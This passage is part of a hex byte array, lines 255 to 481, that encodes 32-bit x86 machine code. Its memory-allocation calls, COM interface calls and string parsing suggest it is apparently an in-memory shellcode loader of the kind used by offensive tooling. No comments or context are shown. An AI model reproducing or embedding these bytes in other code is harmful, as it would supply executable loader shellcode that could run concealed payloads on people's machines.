255 0x06, 0x89, 0x48, 0x14, 0xe8, 0x2c, 0x15, 0x00, 0x00, 0xb9, 0x11, 0x1b,
256 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x18, 0xe8,
257 0x19, 0x15, 0x00, 0x00, 0xb9, 0x0c, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03,
258 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x1c, 0xe8, 0x06, 0x15, 0x00, 0x00, 0xb9,
259 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48,
260 0x20, 0xe8, 0xf3, 0x14, 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b,
261 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x24, 0xe8, 0xe0, 0x14, 0x00,
262 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06,
263 0x89, 0x48, 0x28, 0xe8, 0xcd, 0x14, 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40,
264 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x2c, 0xe8, 0xba,
265 0x14, 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8,
266 0x8b, 0x06, 0x89, 0x48, 0x30, 0xe8, 0xa7, 0x14, 0x00, 0x00, 0xb9, 0x43,
267 0x1e, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x34,
268 0xe8, 0x94, 0x14, 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf,
269 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x38, 0xe8, 0x81, 0x14, 0x00, 0x00,
270 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89,
271 0x48, 0x3c, 0xe8, 0x6e, 0x14, 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00,
272 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x40, 0xe8, 0x5b, 0x14,
273 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b,
274 0x06, 0x89, 0x48, 0x44, 0xe8, 0x48, 0x14, 0x00, 0x00, 0xb9, 0x1e, 0x11,
275 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x48, 0xe8,
276 0x35, 0x14, 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03,
277 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x4c, 0xe8, 0x22, 0x14, 0x00, 0x00, 0xb9,
278 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48,
279 0x50, 0xe8, 0x0f, 0x14, 0x00, 0x00, 0xb9, 0xa1, 0x1a, 0x40, 0x00, 0x2b,
280 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x54, 0xe8, 0xfc, 0x13, 0x00,
281 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06,
282 0x89, 0x48, 0x58, 0xe8, 0xe9, 0x13, 0x00, 0x00, 0xb9, 0xc5, 0x1a, 0x40,
283 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x5c, 0xe8, 0xd6,
284 0x13, 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8,
285 0x8b, 0x06, 0x89, 0x48, 0x60, 0xe8, 0xc3, 0x13, 0x00, 0x00, 0xb9, 0x6b,
286 0x1e, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x64,
287 0xe8, 0xb0, 0x13, 0x00, 0x00, 0xb9, 0x99, 0x1a, 0x40, 0x00, 0x2b, 0xcf,
288 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x68, 0xe8, 0x9d, 0x13, 0x00, 0x00,
289 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89,
290 0x48, 0x6c, 0xe8, 0x8a, 0x13, 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00,
291 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x70, 0xe8, 0x77, 0x13,
292 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x8b, 0x7d, 0x08,
293 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x74, 0x8d, 0x85, 0xfc, 0xfd, 0xff,
294 0xff, 0x83, 0x66, 0x10, 0x00, 0x50, 0x8d, 0x87, 0xe8, 0x05, 0x00, 0x00,
295 0x89, 0x7e, 0x14, 0x50, 0x57, 0xe8, 0x30, 0x13, 0x00, 0x00, 0x83, 0xc4,
296 0x0c, 0x8d, 0x5e, 0x04, 0x8d, 0x85, 0xfc, 0xfd, 0xff, 0xff, 0x53, 0x50,
297 0xff, 0x97, 0x8c, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x13, 0x8b, 0x0b,
298 0x8d, 0x46, 0x08, 0x50, 0x8d, 0x87, 0x84, 0x06, 0x00, 0x00, 0x50, 0x8b,
299 0x11, 0x51, 0xff, 0x52, 0x18, 0x5f, 0x5e, 0x5b, 0xc9, 0xc3, 0x8b, 0x54,
300 0x24, 0x0c, 0x85, 0xd2, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb,
301 0x5f, 0x53, 0x8b, 0x5c, 0x24, 0x0c, 0x33, 0xc9, 0x56, 0x8b, 0x74, 0x24,
302 0x0c, 0x57, 0x8b, 0x7e, 0x14, 0x8b, 0x84, 0x8f, 0xf4, 0x05, 0x00, 0x00,
303 0x3b, 0x04, 0x8b, 0x75, 0x08, 0x41, 0x83, 0xf9, 0x04, 0x75, 0xee, 0xeb,
304 0x2a, 0x33, 0xc9, 0x8b, 0x84, 0x8f, 0x04, 0x06, 0x00, 0x00, 0x3b, 0x04,
305 0x8b, 0x75, 0x08, 0x41, 0x83, 0xf9, 0x04, 0x75, 0xee, 0xeb, 0x14, 0x33,
306 0xc9, 0x8b, 0x84, 0x8f, 0x84, 0x06, 0x00, 0x00, 0x3b, 0x04, 0x8b, 0x75,
307 0x0c, 0x41, 0x83, 0xf9, 0x04, 0x75, 0xee, 0x89, 0x32, 0x33, 0xc0, 0xeb,
308 0x08, 0x83, 0x22, 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0x5f, 0x5e, 0x5b,
309 0xc2, 0x0c, 0x00, 0x8b, 0x44, 0x24, 0x04, 0x6a, 0x00, 0x6a, 0x00, 0x6a,
310 0xfd, 0x8b, 0x40, 0x0c, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x38, 0x33, 0xc0,
311 0xc2, 0x08, 0x00, 0x8b, 0x4c, 0x24, 0x04, 0x83, 0xc8, 0xff, 0xf0, 0x0f,
312 0xc1, 0x41, 0x10, 0x48, 0xc2, 0x04, 0x00, 0x8b, 0x44, 0x24, 0x04, 0xff,
313 0x74, 0x24, 0x08, 0x8b, 0x40, 0x14, 0xff, 0x50, 0x4c, 0x33, 0xc0, 0xc2,
314 0x08, 0x00, 0x55, 0x8b, 0xec, 0x81, 0xec, 0x80, 0x00, 0x00, 0x00, 0x56,
315 0x8b, 0x75, 0x08, 0x57, 0x81, 0xc6, 0x6c, 0x04, 0x00, 0x00, 0x8a, 0x0e,
316 0x33, 0xc0, 0x84, 0xc9, 0x74, 0x3f, 0x8d, 0x7d, 0x80, 0x8b, 0xd6, 0x2b,
317 0xfe, 0x80, 0xf9, 0x3b, 0x74, 0x12, 0x3d, 0x80, 0x00, 0x00, 0x00, 0x7d,
318 0x0b, 0x88, 0x0c, 0x17, 0x40, 0x42, 0x8a, 0x0a, 0x84, 0xc9, 0x75, 0xe9,
319 0x85, 0xc0, 0x74, 0x1d, 0xff, 0x75, 0x0c, 0x46, 0xc6, 0x44, 0x05, 0x80,
320 0x00, 0x03, 0xf0, 0x8d, 0x45, 0x80, 0x50, 0xe8, 0xc3, 0x16, 0x00, 0x00,
321 0x59, 0x59, 0x85, 0xc0, 0x75, 0xbc, 0x40, 0xeb, 0x02, 0x33, 0xc0, 0x5f,
322 0x5e, 0xc9, 0xc3, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x1c, 0x83, 0x7d, 0x0c,
323 0x00, 0x74, 0x31, 0x6a, 0x1c, 0x8d, 0x45, 0xe4, 0x50, 0x8b, 0x45, 0x08,
324 0xff, 0x75, 0x0c, 0xff, 0x50, 0x44, 0x83, 0xf8, 0x1c, 0x75, 0x1d, 0x81,
325 0x7d, 0xf4, 0x00, 0x10, 0x00, 0x00, 0x75, 0x14, 0x81, 0x7d, 0xfc, 0x00,
326 0x00, 0x02, 0x00, 0x75, 0x0b, 0x83, 0x7d, 0xf8, 0x04, 0x75, 0x05, 0x33,
327 0xc0, 0x40, 0xc9, 0xc3, 0x33, 0xc0, 0xc9, 0xc3, 0x81, 0xec, 0x10, 0x02,
328 0x00, 0x00, 0x53, 0x8b, 0x9c, 0x24, 0x18, 0x02, 0x00, 0x00, 0x33, 0xc0,
329 0x21, 0x44, 0x24, 0x04, 0x55, 0x8b, 0xac, 0x24, 0x24, 0x02, 0x00, 0x00,
330 0x8b, 0x8b, 0xb8, 0x00, 0x00, 0x00, 0x56, 0x57, 0x85, 0xc9, 0x0f, 0x84,
331 0xaa, 0x00, 0x00, 0x00, 0x55, 0x8d, 0x83, 0x24, 0x06, 0x00, 0x00, 0x50,
332 0x8d, 0x83, 0x14, 0x06, 0x00, 0x00, 0x50, 0xff, 0xd1, 0x8b, 0xb4, 0x24,
333 0x28, 0x02, 0x00, 0x00, 0x85, 0xc0, 0x78, 0x68, 0x8d, 0x44, 0x24, 0x20,
334 0x50, 0x8d, 0x46, 0x0c, 0x50, 0x53, 0xe8, 0x5b, 0x11, 0x00, 0x00, 0x8b,
335 0x55, 0x00, 0x8d, 0x7d, 0x04, 0x83, 0xc4, 0x0c, 0x8d, 0x83, 0x34, 0x06,
336 0x00, 0x00, 0x8b, 0x0a, 0x57, 0x50, 0x8d, 0x44, 0x24, 0x28, 0x50, 0x52,
337 0xff, 0x51, 0x0c, 0x85, 0xc0, 0x78, 0x34, 0x8b, 0x07, 0x8d, 0x54, 0x24,
338 0x14, 0x52, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x28, 0x85, 0xc0, 0x78, 0x30,
339 0x83, 0x7c, 0x24, 0x14, 0x00, 0x74, 0x25, 0x8b, 0x0f, 0x8d, 0x45, 0x08,
340 0x50, 0x8d, 0x83, 0x54, 0x06, 0x00, 0x00, 0x50, 0x8b, 0x11, 0x8d, 0x83,
341 0x44, 0x06, 0x00, 0x00, 0x50, 0x51, 0xff, 0x52, 0x24, 0xeb, 0x09, 0x83,
342 0x27, 0x00, 0xeb, 0x04, 0x83, 0x65, 0x00, 0x00, 0x85, 0xc0, 0x79, 0x34,
343 0x8d, 0x45, 0x08, 0x50, 0x8d, 0x83, 0x54, 0x06, 0x00, 0x00, 0x50, 0x8d,
344 0x83, 0x44, 0x06, 0x00, 0x00, 0x50, 0x6a, 0x00, 0x6a, 0x00, 0xff, 0x93,
345 0xb4, 0x00, 0x00, 0x00, 0xeb, 0x07, 0x8b, 0xb4, 0x24, 0x28, 0x02, 0x00,
346 0x00, 0x85, 0xc0, 0x79, 0x0b, 0x83, 0x65, 0x08, 0x00, 0x33, 0xc0, 0xe9,
347 0xfb, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x50, 0x8b, 0x08, 0xff, 0x51,
348 0x28, 0x85, 0xc0, 0x0f, 0x88, 0xe6, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24,
349 0x20, 0x50, 0x8d, 0x86, 0x0c, 0x01, 0x00, 0x00, 0x50, 0x53, 0xe8, 0xa3,
350 0x10, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x20, 0x50, 0xff,
351 0x93, 0x84, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x08, 0x8b, 0xf8, 0x8d, 0x45,
352 0x0c, 0x50, 0x6a, 0x00, 0x8b, 0x0a, 0x57, 0x52, 0xff, 0x51, 0x30, 0x57,
353 0x8b, 0xf0, 0xff, 0x93, 0x88, 0x00, 0x00, 0x00, 0x85, 0xf6, 0x0f, 0x88,
354 0xa3, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x0c, 0x8d, 0x45, 0x10, 0x50, 0x8d,
355 0x83, 0x64, 0x06, 0x00, 0x00, 0x50, 0x8b, 0x0a, 0x52, 0xff, 0x11, 0x85,
356 0xc0, 0x0f, 0x88, 0x88, 0x00, 0x00, 0x00, 0x8b, 0xb4, 0x24, 0x28, 0x02,
357 0x00, 0x00, 0x83, 0x64, 0x24, 0x1c, 0x00, 0x8b, 0x86, 0x24, 0x05, 0x00,
358 0x00, 0x89, 0x44, 0x24, 0x18, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a, 0x01,
359 0x6a, 0x11, 0xff, 0x53, 0x6c, 0x8b, 0xf8, 0x85, 0xff, 0x74, 0x60, 0x8b,
360 0x57, 0x0c, 0x33, 0xc9, 0x39, 0x8e, 0x24, 0x05, 0x00, 0x00, 0x76, 0x13,
361 0x8a, 0x84, 0x0e, 0x28, 0x05, 0x00, 0x00, 0x88, 0x04, 0x0a, 0x41, 0x3b,
362 0x8e, 0x24, 0x05, 0x00, 0x00, 0x72, 0xed, 0x8b, 0x4d, 0x10, 0x8d, 0x45,
363 0x14, 0x50, 0x57, 0x51, 0x8b, 0x11, 0xff, 0x92, 0xb4, 0x00, 0x00, 0x00,
364 0xf7, 0xd8, 0x1b, 0xc0, 0x33, 0xd2, 0x40, 0x8b, 0xca, 0x89, 0x44, 0x24,
365 0x10, 0x8b, 0x47, 0x0c, 0x39, 0x96, 0x24, 0x05, 0x00, 0x00, 0x76, 0x13,
366 0x88, 0x94, 0x0e, 0x28, 0x05, 0x00, 0x00, 0x88, 0x14, 0x08, 0x41, 0x3b,
367 0x8e, 0x24, 0x05, 0x00, 0x00, 0x72, 0xed, 0x57, 0xff, 0x53, 0x78, 0x8b,
368 0x44, 0x24, 0x10, 0x5f, 0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0x10, 0x02, 0x00,
369 0x00, 0xc3, 0x81, 0xec, 0x3c, 0x01, 0x00, 0x00, 0x53, 0x55, 0x56, 0x8b,
370 0xb4, 0x24, 0x4c, 0x01, 0x00, 0x00, 0x57, 0xff, 0x76, 0x2c, 0xff, 0x76,
371 0x28, 0xff, 0x76, 0x4c, 0xff, 0x76, 0x48, 0x56, 0xe8, 0xc2, 0x0f, 0x00,
372 0x00, 0xff, 0x76, 0x2c, 0x8b, 0xe8, 0xff, 0x76, 0x28, 0x89, 0x6c, 0x24,
373 0x34, 0xff, 0x76, 0x54, 0xff, 0x76, 0x50, 0x56, 0xe8, 0xaa, 0x0f, 0x00,
374 0x00, 0xff, 0x76, 0x2c, 0x8b, 0xd8, 0xff, 0x76, 0x28, 0x89, 0x5c, 0x24,
375 0x44, 0xff, 0xb6, 0x8c, 0x01, 0x00, 0x00, 0xff, 0xb6, 0x88, 0x01, 0x00,
376 0x00, 0x56, 0xe8, 0x8c, 0x0f, 0x00, 0x00, 0x83, 0xc4, 0x3c, 0x8b, 0xf8,
377 0x89, 0x7c, 0x24, 0x10, 0x85, 0xed, 0x74, 0x27, 0x85, 0xdb, 0x74, 0x23,
378 0x85, 0xff, 0x74, 0x1f, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00, 0xff,
379 0x36, 0x6a, 0x00, 0xff, 0xd5, 0x8b, 0xd8, 0x85, 0xdb, 0x75, 0x1a, 0x83,
380 0xbe, 0x30, 0x02, 0x00, 0x00, 0x02, 0x75, 0x03, 0x50, 0xff, 0xd7, 0x83,
381 0xc8, 0xff, 0x5f, 0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0x3c, 0x01, 0x00, 0x00,
382 0xc3, 0xff, 0x36, 0x56, 0x53, 0xe8, 0xa4, 0x13, 0x00, 0x00, 0x6a, 0x20,
383 0x8d, 0x44, 0x24, 0x38, 0x6a, 0x00, 0x50, 0xe8, 0xba, 0x13, 0x00, 0x00,
384 0x83, 0xc4, 0x18, 0x83, 0xbb, 0x34, 0x02, 0x00, 0x00, 0x03, 0x75, 0x49,
385 0x8b, 0x03, 0x2d, 0x40, 0x02, 0x00, 0x00, 0x50, 0x8d, 0x83, 0x40, 0x02,
386 0x00, 0x00, 0x50, 0x8d, 0x43, 0x14, 0x50, 0x8d, 0x43, 0x04, 0x50, 0xe8,
387 0x73, 0x10, 0x00, 0x00, 0xff, 0x73, 0x2c, 0x8d, 0x83, 0xf0, 0x07, 0x00,
388 0x00, 0xff, 0x73, 0x28, 0x50, 0xe8, 0x3c, 0x0f, 0x00, 0x00, 0x83, 0xc4,
389 0x1c, 0x3b, 0x83, 0xf0, 0x08, 0x00, 0x00, 0x0f, 0x85, 0x7d, 0x02, 0x00,
390 0x00, 0x3b, 0x93, 0xf4, 0x08, 0x00, 0x00, 0x0f, 0x85, 0x71, 0x02, 0x00,
391 0x00, 0xff, 0x73, 0x2c, 0xff, 0x73, 0x28, 0xff, 0x73, 0x34, 0xff, 0x73,
392 0x30, 0x53, 0xe8, 0xcc, 0x0e, 0x00, 0x00, 0x83, 0xc4, 0x14, 0x89, 0x43,
393 0x30, 0x85, 0xc0, 0x0f, 0x84, 0x66, 0xff, 0xff, 0xff, 0x8d, 0xb3, 0x44,
394 0x02, 0x00, 0x00, 0x8a, 0x0e, 0x33, 0xc0, 0x84, 0xc9, 0x74, 0x35, 0x8d,
395 0x7c, 0x24, 0x48, 0x8b, 0xd6, 0x2b, 0xfe, 0x80, 0xf9, 0x3b, 0x74, 0x12,
396 0x3d, 0x04, 0x01, 0x00, 0x00, 0x73, 0x0b, 0x88, 0x0c, 0x3a, 0x40, 0x42,
397 0x8a, 0x0a, 0x84, 0xc9, 0x75, 0xe9, 0x85, 0xc0, 0x74, 0x12, 0x46, 0xc6,
398 0x44, 0x04, 0x48, 0x00, 0x03, 0xf0, 0x8d, 0x44, 0x24, 0x48, 0x50, 0xff,
399 0x53, 0x30, 0xeb, 0xc3, 0x33, 0xff, 0x47, 0x39, 0xbb, 0x40, 0x02, 0x00,
400 0x00, 0x76, 0x38, 0x8d, 0x6b, 0x34, 0x8d, 0x73, 0x38, 0xff, 0x73, 0x2c,
401 0xff, 0x73, 0x28, 0xff, 0x76, 0x04, 0xff, 0x36, 0x53, 0xe8, 0x59, 0x0e,
402 0x00, 0x00, 0x83, 0xc4, 0x14, 0x89, 0x45, 0x00, 0x85, 0xc0, 0x0f, 0x84,
403 0xda, 0x01, 0x00, 0x00, 0x47, 0x83, 0xc6, 0x08, 0x83, 0xc5, 0x04, 0x3b,
404 0xbb, 0x40, 0x02, 0x00, 0x00, 0x72, 0xd2, 0x8b, 0x6c, 0x24, 0x18, 0x8b,
405 0x83, 0xe4, 0x06, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x75, 0x17, 0x53, 0xe8,
406 0x53, 0xf3, 0xff, 0xff, 0x59, 0x85, 0xc0, 0x0f, 0x84, 0xad, 0x01, 0x00,
407 0x00, 0x8b, 0xb3, 0x20, 0x09, 0x00, 0x00, 0xeb, 0x18, 0x83, 0xf8, 0x03,
408 0x0f, 0x84, 0x9c, 0x01, 0x00, 0x00, 0x8d, 0xb3, 0x20, 0x09, 0x00, 0x00,
409 0x83, 0xf8, 0x01, 0x74, 0x04, 0x8b, 0x74, 0x24, 0x1c, 0x83, 0xbb, 0x6c,
410 0x05, 0x00, 0x00, 0x01, 0x74, 0x30, 0x53, 0xe8, 0x4f, 0xf1, 0xff, 0xff,
411 0x59, 0x85, 0xc0, 0x75, 0x0d, 0x83, 0xbb, 0x6c, 0x05, 0x00, 0x00, 0x02,
412 0x0f, 0x84, 0x6c, 0x01, 0x00, 0x00, 0x53, 0xe8, 0x1d, 0xf2, 0xff, 0xff,
413 0x59, 0x85, 0xc0, 0x75, 0x0d, 0x83, 0xbb, 0x6c, 0x05, 0x00, 0x00, 0x02,
414 0x0f, 0x84, 0x54, 0x01, 0x00, 0x00, 0x83, 0x7e, 0x08, 0x01, 0x0f, 0x84,
415 0xeb, 0x00, 0x00, 0x00, 0x8b, 0x86, 0x24, 0x05, 0x00, 0x00, 0xbf, 0x30,
416 0x05, 0x00, 0x00, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00, 0x03, 0xc7,
417 0x50, 0x6a, 0x00, 0xff, 0xd5, 0x8b, 0xe8, 0x85, 0xed, 0x0f, 0x84, 0x27,
418 0x01, 0x00, 0x00, 0x57, 0x56, 0x55, 0xe8, 0xf3, 0x11, 0x00, 0x00, 0x8b,
419 0x46, 0x08, 0x83, 0xc4, 0x0c, 0x83, 0xf8, 0x03, 0x74, 0x2d, 0x83, 0xf8,
420 0x04, 0x74, 0x28, 0x83, 0xf8, 0x05, 0x74, 0x23, 0x83, 0xf8, 0x02, 0x0f,
421 0x85, 0xa2, 0x00, 0x00, 0x00, 0x8d, 0x85, 0x28, 0x05, 0x00, 0x00, 0x50,
422 0x8d, 0x86, 0x28, 0x05, 0x00, 0x00, 0x50, 0xe8, 0xc8, 0x0f, 0x00, 0x00,
423 0x59, 0x59, 0xe9, 0x86, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x20, 0xb9,
424 0x00, 0x01, 0x00, 0x00, 0x50, 0x8d, 0x44, 0x24, 0x20, 0x50, 0x66, 0x8b,
425 0x46, 0x08, 0x66, 0x48, 0x66, 0x0b, 0xc1, 0x0f, 0xb7, 0xc0, 0x50, 0xff,
426 0x93, 0xe4, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x85, 0xbd, 0x00, 0x00,
427 0x00, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00, 0xff, 0x74, 0x24, 0x24,
428 0x50, 0xff, 0x54, 0x24, 0x28, 0x8b, 0xf8, 0x8d, 0x8e, 0x28, 0x05, 0x00,
429 0x00, 0x57, 0x8d, 0x44, 0x24, 0x28, 0x50, 0xff, 0xb6, 0x20, 0x05, 0x00,
430 0x00, 0x66, 0x8b, 0x46, 0x08, 0x51, 0xff, 0xb6, 0x24, 0x05, 0x00, 0x00,
431 0x8d, 0x8d, 0x28, 0x05, 0x00, 0x00, 0x66, 0x48, 0x51, 0xb9, 0x00, 0x01,
432 0x00, 0x00, 0x66, 0x0b, 0xc1, 0x0f, 0xb7, 0xc0, 0x50, 0xff, 0x93, 0xe8,
433 0x00, 0x00, 0x00, 0x68, 0x00, 0xc0, 0x00, 0x00, 0x6a, 0x00, 0x57, 0x8b,
434 0xf0, 0xff, 0x54, 0x24, 0x20, 0x85, 0xf6, 0x75, 0x61, 0x8b, 0xf5, 0x83,
435 0x3e, 0x03, 0x74, 0x51, 0x83, 0x3e, 0x04, 0x74, 0x4c, 0x83, 0x3e, 0x01,
436 0x74, 0x18, 0x83, 0x3e, 0x02, 0x74, 0x13, 0x83, 0x3e, 0x05, 0x74, 0x05,
437 0x83, 0x3e, 0x06, 0x75, 0x41, 0x56, 0x53, 0xe8, 0x1f, 0x08, 0x00, 0x00,
438 0xeb, 0x36, 0x8d, 0x44, 0x24, 0x28, 0x50, 0x56, 0x53, 0xe8, 0xc6, 0xfa,
439 0xff, 0xff, 0x83, 0xc4, 0x0c, 0x85, 0xc0, 0x74, 0x0f, 0x8d, 0x44, 0x24,
440 0x28, 0x50, 0x56, 0x53, 0xe8, 0x8f, 0x00, 0x00, 0x00, 0x83, 0xc4, 0x0c,
441 0x8d, 0x44, 0x24, 0x28, 0x50, 0x53, 0xe8, 0x7d, 0xf5, 0xff, 0xff, 0xeb,
442 0x07, 0x56, 0x53, 0xe8, 0xa6, 0x03, 0x00, 0x00, 0x59, 0x59, 0x8b, 0x7c,
443 0x24, 0x10, 0x8b, 0x83, 0xe4, 0x06, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x74,
444 0x05, 0x83, 0xf8, 0x03, 0x75, 0x33, 0x8b, 0x83, 0x20, 0x09, 0x00, 0x00,
445 0x85, 0xc0, 0x74, 0x29, 0xff, 0xb3, 0x18, 0x09, 0x00, 0x00, 0x6a, 0x00,
446 0x50, 0xe8, 0xcc, 0x10, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x68, 0x00, 0xc0,
447 0x00, 0x00, 0x6a, 0x00, 0xff, 0xb3, 0x20, 0x09, 0x00, 0x00, 0xff, 0x54,
448 0x24, 0x20, 0x83, 0xa3, 0x20, 0x09, 0x00, 0x00, 0x00, 0xff, 0x33, 0x8b,
449 0xb3, 0x30, 0x02, 0x00, 0x00, 0x6a, 0x00, 0x53, 0xe8, 0xa1, 0x10, 0x00,
450 0x00, 0x83, 0xc4, 0x0c, 0x68, 0x00, 0xc0, 0x00, 0x00, 0x6a, 0x00, 0x53,
451 0xff, 0x54, 0x24, 0x20, 0x83, 0xfe, 0x02, 0x75, 0x04, 0x6a, 0x00, 0xff,
452 0xd7, 0x33, 0xc0, 0xe9, 0xa6, 0xfc, 0xff, 0xff, 0x81, 0xec, 0x78, 0x02,
453 0x00, 0x00, 0x53, 0x55, 0x56, 0x8b, 0xb4, 0x24, 0x8c, 0x02, 0x00, 0x00,
454 0x33, 0xc0, 0x57, 0x8d, 0x7c, 0x24, 0x44, 0x33, 0xed, 0x21, 0x6c, 0x24,
455 0x1c, 0xab, 0xab, 0xab, 0xab, 0x33, 0xc0, 0x83, 0x3e, 0x02, 0x66, 0x89,
456 0x44, 0x24, 0x18, 0x0f, 0x85, 0x7e, 0x01, 0x00, 0x00, 0x8b, 0x84, 0x24,
457 0x94, 0x02, 0x00, 0x00, 0x8b, 0x48, 0x14, 0x8d, 0x78, 0x1c, 0x57, 0x51,
458 0x8b, 0x01, 0xff, 0x50, 0x40, 0x85, 0xc0, 0x0f, 0x88, 0x5b, 0x01, 0x00,
459 0x00, 0x8b, 0x07, 0x8d, 0x54, 0x24, 0x1c, 0x52, 0x50, 0x8b, 0x08, 0xff,
460 0x51, 0x48, 0x85, 0xc0, 0x0f, 0x88, 0xbe, 0x02, 0x00, 0x00, 0x8b, 0x9c,
461 0x24, 0x8c, 0x02, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x2c, 0x50, 0x6a, 0x01,
462 0xff, 0x74, 0x24, 0x24, 0xff, 0x53, 0x7c, 0x8d, 0x44, 0x24, 0x28, 0x50,
463 0x6a, 0x01, 0xff, 0x74, 0x24, 0x24, 0xff, 0x93, 0x80, 0x00, 0x00, 0x00,
464 0x8b, 0x44, 0x24, 0x28, 0x2b, 0x44, 0x24, 0x2c, 0x83, 0xc0, 0x01, 0x0f,
465 0x84, 0xcc, 0x00, 0x00, 0x00, 0x6a, 0x01, 0x55, 0x6a, 0x0c, 0xff, 0x53,
466 0x70, 0x81, 0xc6, 0x0c, 0x04, 0x00, 0x00, 0x8b, 0xe8, 0x80, 0x3e, 0x00,
467 0x74, 0x70, 0x8d, 0x84, 0x24, 0x84, 0x00, 0x00, 0x00, 0x50, 0x56, 0x53,
468 0xe8, 0x19, 0x0b, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x14,
469 0x50, 0x8d, 0x84, 0x24, 0x88, 0x00, 0x00, 0x00, 0x50, 0xff, 0x53, 0x68,
470 0xff, 0x74, 0x24, 0x14, 0x8b, 0xf0, 0xb8, 0x08, 0x20, 0x00, 0x00, 0x6a,
471 0x00, 0x6a, 0x08, 0x66, 0x89, 0x44, 0x24, 0x40, 0xff, 0x53, 0x70, 0x33,
472 0xc9, 0x89, 0x44, 0x24, 0x3c, 0x89, 0x4c, 0x24, 0x10, 0x39, 0x4c, 0x24,
473 0x14, 0x76, 0x5b, 0xff, 0x34, 0x8e, 0xff, 0x93, 0x84, 0x00, 0x00, 0x00,
474 0x50, 0x8d, 0x44, 0x24, 0x14, 0x50, 0xff, 0x74, 0x24, 0x44, 0xff, 0x53,
475 0x74, 0x8b, 0x4c, 0x24, 0x10, 0x41, 0x89, 0x4c, 0x24, 0x10, 0x3b, 0x4c,
476 0x24, 0x14, 0x72, 0xdb, 0xeb, 0x34, 0x6a, 0x01, 0x6a, 0x00, 0xb8, 0x08,
477 0x20, 0x00, 0x00, 0x6a, 0x08, 0x66, 0x89, 0x44, 0x24, 0x40, 0xff, 0x53,
478 0x70, 0x83, 0x64, 0x24, 0x10, 0x00, 0x89, 0x44, 0x24, 0x3c, 0x8d, 0x44,
479 0x24, 0x18, 0x50, 0xff, 0x93, 0x84, 0x00, 0x00, 0x00, 0x50, 0x8d, 0x44,
480 0x24, 0x14, 0x50, 0xff, 0x74, 0x24, 0x44, 0xff, 0x53, 0x74, 0x83, 0x64,
481 0x24, 0x10, 0x00, 0x8d, 0x44, 0x24, 0x34, 0x50, 0x8d, 0x44, 0x24, 0x14,
